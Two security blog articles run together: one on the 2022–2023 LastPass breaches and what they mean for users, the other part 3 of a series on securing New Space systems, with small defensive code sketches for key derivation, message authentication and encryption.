For many years, the industry recognized LastPass as a reliable and secure password-management service. In fact, LastPass grew its subscriber list to more than 33 million users and over 100,000 businesses globally. Touting its Zero-Knowledge architecture, 256-bit encryption and attractive user interface, LastPass was seen as the go-to option for secure password management. Unfortunately, 2022 proved to be a tumultuous year for the self-proclaimed “pioneer in cloud security technology”. So far, 2023 isn’t providing much comfort either.

On August 25, 2022, the CEO of LastPass informed users that the organization detected “unusual activity” in its development environment. LastPass later confirmed the activity as a security breach. According to LastPass, they had no evidence that the intrusion had compromised customer data. The company still assured its users that they “implemented additional enhanced security measures” to better protect their environment moving forward.

The security issues continue

Then, in November 2022, LastPass stated that its third-party cloud storage service, which it shared with its partner GoTo, was also breached, using information obtained in the August attack. LastPass notified the authorities and insisted that its customers' data was safe due to its Zero-Knowledge architecture.

Fast forward one month. In December 2022, LastPass updated its findings from the August data breach and advised all of its users that hackers did, in fact, obtain an extensive amount of sensitive details from their user accounts, including usernames, email addresses, IP information and other data. Of particular concern was the fact that customer vault data was among the stolen information. However, according to LastPass, the heavily encrypted data would remain very difficult for the attackers to decrypt.

On March 1, 2023, the penny dropped when LastPass notified users of its official findings that the incident surrounding its recent breaches was due to a compromised software engineer’s corporate laptop. The threat actor targeted a senior DevOps engineer, exploiting third-party software, and gained access to “highly secure” API and third-party integration secrets, system configuration data and encrypted and unencrypted user data.

What risks are LastPass users now facing?

In short, if you are or were one of LastPass’s subscribers, hackers can access all of your LastPass vault data. Let that sink in for a minute.

Before you run to your computer and start dismantling it in fear, it's important to recognize the significance of LastPass's 256-bit encryption. While hackers may have access to your data, it remains extremely difficult for them to actually use that information without the proper decryption key.

However, this does not discount the fact that users are now facing a heightened risk of identity theft and fraud. The most troubling of LastPass’s recent statements suggest that hackers gained access to the company’s encryption protocols and proprietary software, which could lead to the potential for attackers to decrypt customer vault data down the road using sophisticated tools.

Additionally, LastPass’ vault security is only as strong as the chosen master password. It’s clear that many users will need to take action sooner rather than later to close the security gap.
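
To see why the master password is the anchor, consider how password managers generally derive a vault key. The sketch below uses PBKDF2-HMAC-SHA256 from Python's standard library; the salt handling and iteration count are illustrative assumptions, not LastPass's actual parameters.

```python
import hashlib
import os

def derive_vault_key(master_password: str, salt: bytes,
                     iterations: int = 600_000) -> bytes:
    """Stretch a master password into a 256-bit vault encryption key."""
    return hashlib.pbkdf2_hmac("sha256", master_password.encode("utf-8"),
                               salt, iterations, dklen=32)

salt = os.urandom(16)                     # stored alongside the vault, not secret
key = derive_vault_key("correct horse battery staple", salt)
assert len(key) == 32                     # 256 bits

# Iterations slow down offline guessing, but they cannot rescue a weak or
# reused master password once an attacker holds a copy of the vault.
```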

Is LastPass still safe to use?

Following the aftermath of the recent LastPass data breaches, it’s no secret that the company is doing serious damage control: not only to its security systems and process but also to its brand reputation.

However, one of the main issues that LastPass has to address to the public is its response time. LastPass was slow to not only investigate the threats but also to subsequently inform its users of the various breaches. This delay showcased a lack of transparency from LastPass, indicating that the company did not properly manage security processes or take appropriate measures to protect customer data.

Security experts are starting to agree that LastPass has let its guard down when it comes to protecting user data, potentially by focusing too much on attracting new market share and not enough on proper security protocols. The general message is that LastPass may still be utilizing strong encryption protocols, but there are still too many unanswered questions when it comes to how they handle persistent threats.

As Jeremi Gosney, esteemed password cracker and Senior Principal Engineer of the Yahoo security team, recently explained in an extensive series of posts, “I used to support LastPass. I recommended it for years and defended it publicly in the media… But things change.”

In addition, Gosney released a comprehensive article on Infosec Exchange urging people to switch to an alternate password manager for greater security.

“LastPass’s claim of ‘zero knowledge’ is a bald-faced lie,” Gosney says, alleging that the company has “about as much knowledge as a password manager can possibly get away with.”

What should your next step be?

When it comes to password management, there are always multiple arguments to bring to the table.

On the one hand, LastPass offers a great user experience and powerful security features. While the most recent incidents paint them in an incriminating light, the security measures they use aren’t significantly different from those of other password managers.

On the other hand, everyone needs to ask themselves whether their data is “really” secure when placed in third-party hands. For many, this situation only heightens the need for more organizations to move to passwordless environments that eliminate the need for users to store and change their passwords regularly.

But for those current users of LastPass who are still unsure about whether or not to move their password security to another provider, simplify your decision by considering the answer to this question:

If you were a bank owner who just experienced a robbery only to find out that your bank security team was sleeping on the job, would you still trust them to get the job done right? Or would you find someone else more qualified?

Cybersecurity in the next-generation space age, pt. 3: Securing the new space

View Part 1, Introduction to New Space, and Part 2, Cybersecurity Threats in New Space, in this series.

As we saw in the previous article in this series, which discussed the cybersecurity threats in the New Space, space technology is advancing at an unprecedented rate, with new technologies being launched into orbit at an increasingly rapid pace.

The need to ensure the security and safety of these technologies has never been more pressing.

So, let's explore a range of measures to secure space systems.

Security by design

Security by design is an approach to designing systems, products, or applications with security as a primary consideration from the outset, rather than adding it as an afterthought.

Security by design is an important consideration in the New Space industry. New Space companies are often startups or smaller companies developing innovative solutions to space-related challenges, and building security in from the outset is essential to the safety, reliability and security of these new technologies and satellites.

One of the key components used in the New Space industry is the software defined radio (SDR).

Let’s dive deeper into the application of a security by design approach for an SDR architecture.

Secure SDR architecture

Software defined radio is the groundbreaking technology leading this new space era. Securing the SDR architecture is thus an essential step in preventing cyberattacks.

The European Secure Software Defined Radio (ESSOR) is a project created by nine European countries. It seeks to develop common technologies for European military radios and provide a secure communication system.

NASA also developed a Space Telecommunications Radio System (STRS) architecture standard.

The purpose of these efforts is to build security by design into the SDR architecture.

An SDR architecture is composed of a software part and a hardware part, and there have been many proposals to secure both.

On the one hand, a proposed secure SDR architecture focusing on hardware is the new spectrum management architecture. This design is based on an automatic calibration and certification unit (ACU), a radio security module (RSM) and a built-in GPS receiver.

Proposed SDR hardware architecture

The ACU is a hardware radio frequency (RF) manager. It checks output power spectrum compliance with the local radio regulation parameters. The ACU is integrated between the programmable physical layer and the RF modules.

RSM is the security manager of the hardware; the local radio regulation parameters are securely downloaded to the hardware and stored in the RSM. It manages the software life cycle — downloading, installation, operation and termination.

This architecture relies on a security module, based on software or tamper-proof hardware, to secure the software operations (download and installation) or the radio frequency configuration parameters.

On the other hand, a proposal for securing SDR based on software architecture looks as follows.

There are some software SDR architecture components that need to be secured.

The new proposed architecture is based on two key concepts. The first key is the separation between the application environment and the radio operating environment so that the compromise of one does not affect the other.

The second key is checking all the SDR reconfiguration parameters created by the application environment against security policies before they can affect the radio environment.

Traditional (a) and proposed (b) secure architecture of SDR

The defined SDR secured architecture includes a secure radio middleware (SRM) layer. It contains the components that need to be secured: radio applications (RA) and the radio operation environment (ROE).

RA is a software component in SDR that controls the radio by implementing the air interface and the modulation and communication protocols. RA needs to be protected because a hacker could reconfigure it with erroneous parameters (frequency, modulation, etc.).

ROE contains the fundamental core components for the radio platform operation.

The SRM layer sits beneath the user application environment (UAE) layer (the OS); thus, it is immune to compromises of user applications (UA) and the UAE.

This secure layer contains verification mechanisms that ensure radio reconfigurations comply with the security policies.
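
As a toy illustration of that idea, the Python sketch below validates every reconfiguration request against stored radio regulation parameters before it can touch the radio; the policy values and field names are invented for illustration.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class RadioPolicy:
    """Locally stored radio regulation parameters (values invented)."""
    min_freq_hz: float
    max_freq_hz: float
    max_power_dbm: float
    allowed_modulations: frozenset

POLICY = RadioPolicy(2.400e9, 2.4835e9, 20.0, frozenset({"GMSK", "QPSK"}))

def validate_reconfiguration(freq_hz: float, power_dbm: float,
                             modulation: str, policy: RadioPolicy = POLICY) -> bool:
    """Reject any reconfiguration request that violates the stored policy."""
    return (policy.min_freq_hz <= freq_hz <= policy.max_freq_hz
            and power_dbm <= policy.max_power_dbm
            and modulation in policy.allowed_modulations)

assert validate_reconfiguration(2.45e9, 10.0, "QPSK")      # compliant request
assert not validate_reconfiguration(5.8e9, 30.0, "QPSK")   # out-of-band, too hot
```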

Proactive defense

Proactive defense in cybersecurity refers to the measures and strategies designed to prevent a potential cyber threat to assets and systems before they can cause harm.

By taking a proactive approach in space systems, New Space companies can better protect themselves against potential cyberattacks and minimize the impact of any security breaches that do occur.

Proactive defense in space systems may include measures like:

  • Risk assessments
  • Vulnerability management
  • Patch management to apply software patches and updates with the aim to fix flaws and vulnerabilities
  • Threat modeling by identifying potential threats and attack vectors
  • Attack surface management
  • Endpoint protection with behavioral analysis and machine learning capabilities
  • Security awareness training for space system operators to educate them about potential space security risks and best practices
  • Offensive security assessments including pentest and red team campaigns to apply an adversarial approach and determine the weaknesses in the space system components.

A proactive approach can help to ensure the safe and effective operation of space-based assets and systems and can also help to maintain the integrity of critical space-based infrastructure.

Reactive defense

Reactive defense refers to the approach of responding to cyber threats and attacks after they have already occurred.

The reactive cyber defense measures may include:

  • Forensic analysis to determine the root cause of a security incident after it has occurred
  • Security Information and Event Management (SIEM) solutions to collect, analyze and respond to security events and alerts from various sources within the space system components
  • Incident response with the development of plans and procedures to respond to security incidents, such as a data breach or a cyberattack on a satellite or ground station
  • Disaster recovery plan.

A reactive approach is very important to minimize the damage caused by a cyberattack and restore normal operations as quickly as possible.

However, by combining proactive and reactive defense measures, space industry actors can create a comprehensive security strategy that addresses both the prevention and response to cyberattacks.

Identity and access management

Identity and access management (IAM) for space assets is an essential measure to improve security posture and streamline how users and consumers access resources and services.

In the ground segment, command and control centers require IAM controls.

Ground station components like the payload control station, flight control station and SDR need to be secured by strict access control policies.

Regarding space vehicles, access control needs to be implemented for SDR, data handler and flight computer components to authorize only legitimate users to access sensitive data and satellite commands.

Space industry actors need to adopt an identity and access management strategy as a part of building an enduring security program using a zero trust approach so that they can:

  • Establish a state of least privilege so no user has any more access than what’s needed
  • Verify continuously, as users access data and tools
  • Always assume a breach.

Signal authentication

Signal authentication is one of the essential mechanisms that can protect satellite communication from attacks like jamming, eavesdropping or spoofing.

Most of the satellites use broadcast flow to send data downlink to the ground station — GNSS data is one such example.

According to research by the company Qascom, GNSS authentication protocols can be categorized into three domains: data level, signal level and hybrid level.

Data level authentication

Data level authentication schemes rely on cryptography. To ensure the integrity, authentication and non-repudiation of exchanged data, we need a broadcast data authentication scheme.

The simplest broadcast data authentication schemes are based on message authentication codes (MACs), which provide data integrity and data authentication, and digital signatures (DSs), which address integrity, authentication and non-repudiation.

These schemes include three main families: block hashing, hash chaining and MAC-based source authentication schemes.

Timed Efficient Stream Loss-Tolerant Authentication (TESLA) is an example of an authentication protocol using MAC-based source authentication schemes. The TESLA protocol is known for its robustness to denial-of-service attacks.

Navigation Message Authentication (NMA) is also a concept of data-level authentication introduced in 2005 to provide authenticity and integrity to the navigation message stream.
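
To illustrate the delayed key disclosure idea behind MAC-based schemes such as TESLA, here is a toy sketch in Python using only the standard library. Real TESLA additionally depends on loose time synchronization between sender and receivers, which is omitted here.

```python
import hashlib
import hmac

def H(data: bytes) -> bytes:
    return hashlib.sha256(data).digest()

# Sender: derive a one-way key chain; keys are used in reverse order of creation,
# so the first value broadcast (the commitment) reveals nothing about later keys.
n = 5
chain = [b"secret seed material"]
for _ in range(n):
    chain.append(H(chain[-1]))
chain.reverse()                     # chain[0] is the public commitment
commitment = chain[0]

# Interval 2: broadcast the message plus a MAC under key K_2 = chain[2];
# K_2 itself is only disclosed in a later interval.
msg = b"navigation message for interval 2"
mac = hmac.new(chain[2], msg, hashlib.sha256).digest()

# Receiver, once K_2 is disclosed: check that the key hashes back to the commitment.
disclosed = chain[2]
k = disclosed
for _ in range(2):
    k = H(k)
assert k == commitment

# Then verify the MAC that arrived earlier using the now-disclosed key.
assert hmac.compare_digest(mac, hmac.new(disclosed, msg, hashlib.sha256).digest())
```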

Signal level authentication

Signal level schemes leverage spread spectrum signal properties. With these schemes, it is hard for an attacker to demodulate the signal without knowledge of the secret code.

Spread spectrum security codes (SSSCs) and signal authentication sequences (SAS) are schemes that were proposed as signal level authentication.

Hybrid level authentication

Hybrid authentication is a solution that combines both data and signal level authentication. Hence the concept of supersonic codes was introduced.

The supersonic codes are block ciphered and in code phase with open codes, and the same code is repeated for a predefined security period. This allows direct authentication without time dependency, as opposed to stream-cipher-based solutions.

The protocol aims to deliver a very fast authentication scheme that does not require knowledge of time.

The supersonic authentication scheme is robust against known GNSS attacks such as spoofing and replay.

Cryptography

Quantum key distribution

Quantum Key Distribution (QKD) is an emerging technique that relies on the unique properties of quantum mechanics and provides tamper-evident communication used to deploy new cryptographic keys with unconditional post-quantum security and without direct physical contact.

In 2016, China launched Micius, a satellite dedicated to quantum cryptography.

The satellite successfully demonstrated the feasibility of satellite-based quantum cryptography and has been used for communication between a fiber-based QKD backbone and remote areas of China.

Post-quantum cryptography

Post-Quantum Cryptography (PQC) is an alternative approach to secure communication and data exchange between satellites and ground stations. Unlike QKD, PQC uses cryptography and mathematical calculation to develop secure cryptosystems for both classical and quantum computers.

In July 2022, the US National Institute of Standards and Technology (NIST) announced the first quantum-safe cryptography protocol standards for cybersecurity in the quantum computing era.

In 2016, contenders from all over the world submitted 69 cryptographic schemes for potential standardization. NIST later narrowed down the list of candidates over three stages, eventually shortlisting seven finalists — four for public key encryption and three for digital signatures. At the end of a six-year-long process, three of the four chosen standards were developed by the IBM team, in collaboration with several industries and academic partners. They include the CRYSTALS-Kyber public-key encryption and the CRYSTALS-Dilithium digital signature algorithms, which were chosen as primary standards. The Falcon digital signature algorithm was chosen as a standard to be used in situations where the use of Dilithium would be space prohibitive.

Security protocols and standards

As discussed earlier in this series, satellite communications are highly exposed to adversary cyberattacks. Many errors and vulnerabilities exist and have been exploited.

Security against communication attacks has therefore become a major issue, and safe, correct communication protocols are necessary.

The Consultative Committee for Space Data Systems (CCSDS) has developed a recommendation standard for the Space Data Link Security Protocol (SDLS).

The CCSDS protocols were developed specifically for space use, tackling packet telemetry.

The SDLS Protocol is a data processing method for space missions that need to apply authentication and/or confidentiality to the contents of transfer frames used by Space Data Link Protocols over a space link. The Security Protocol is provided only at the data link layer (Layer 2) of the OSI Basic Reference Model.

The purpose of the Security Protocol is to provide a secure standard method, with associated data structures, for performing security functions on octet-aligned user data within Space Data Link Protocol transfer frames over a space link.
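
As a rough illustration of the kind of authenticated encryption such a protocol can apply to frame contents, the sketch below uses AES-GCM from the third-party Python 'cryptography' package, authenticating a frame header alongside the encrypted data field. The frame layout is simplified; SDLS defines its own security headers, trailers and field sizes.

```python
import os
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

key = AESGCM.generate_key(bit_length=256)    # mission key, provisioned out of band
aead = AESGCM(key)

frame_header = b"\x12\x34\x56\x78"           # stand-in for a transfer frame header
frame_data = b"telemetry payload bytes"
iv = os.urandom(12)                          # per-frame nonce; never reuse with a key

# Encrypt the frame data field while authenticating the header alongside it.
sealed = aead.encrypt(iv, frame_data, frame_header)

# Receiver side: any tampering with header, ciphertext or tag raises InvalidTag.
assert aead.decrypt(iv, sealed, frame_header) == frame_data
```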

Regarding CubeSats, an open source communication implementation is preferable. CubeSat Space Protocol (CSP) is a lightweight, small network-layer delivery protocol designed for CubeSat communications. CSP supports encryption and integrity protection.

In December 2022, the National Institute of Standards and Technology published an interagency report (NIST IR 8401): a cybersecurity framework for the satellite ground segment of space operations.

The purpose of this framework is to assist the operators of the commercial ground segment in providing cybersecurity for their systems, managing cyber risks, and addressing the Space Policy Directive 5 (SPD-5) goals for space cybersecurity. SPD-5 is the nation’s first comprehensive cybersecurity policy for space systems.

Conclusion

The development and deployment of space technology in the New Space age bring with it a new set of cybersecurity challenges. With the increasing number of satellites and spacecraft being launched, it is essential that we ensure their secure design, operation and communication to prevent cyberattacks that could compromise sensitive data or disrupt satellite services.

Looking forward, the future development of New Space technology holds great promise, with the potential for even more significant discoveries and advancements in various areas. So, what are the future development areas and challenges for the New Space industry? The next article in this series will bring the answer to that question.
